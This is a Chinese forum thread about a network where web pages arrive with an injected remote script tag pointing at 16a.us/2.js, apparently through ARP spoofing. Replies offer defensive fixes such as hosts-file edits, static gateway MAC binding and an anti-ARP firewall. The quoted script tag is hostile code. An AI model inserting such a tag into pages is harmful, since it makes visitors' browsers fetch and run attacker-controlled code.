热搜: 超星 读书 找书

[【公告】] 遭遇16a.us 2.js怎么办?

今天单位电脑访问很多网站页面显示都会异常,显示乱码,起初还以为机子中毒了呢,查了几遍居然没毒,修复IE无效,看了一下乱码页面的源文件:<script src=http://16a.us/2.js></script> ,原来是这家伙搞鬼,网上查了一下解决办法,什么修改Hosts文件;将网关的MAC地址进行静态绑定:(关闭所有IE浏览器,进入CMD模式;输入arp -a指令,可以在返回的结果看到局域网网关的IP地址及MAC地址;输入arp -s 网关IP地址 网关MAC地址,记住这里输入的MAC地址是需要正确的网关MAC地址;进入网络属性,如果不是动态获IP地址,改成动态获IP地址,如果已经是动态获IP地址,则重新修复一下网络连接。)均无效,我郁闷,病毒不在我机子上,别人的机子我又无权干涉,大家有啥高见没?

解决后,请修改主题

保护并修改 HOSTS , 及绑定网关MAC肯定是有效的. 另外注意清理临时文件.

都试过了,无效

你试试ANTIARP防火墙看管用吗,这个软件有个官方网站,你下来试试,他就是预防网关被修改的,我们用还是不错的。

我倒,把自己IP该了一下居然好了。  ANTIARP防火墙看介绍不错,一会儿推荐给同事试试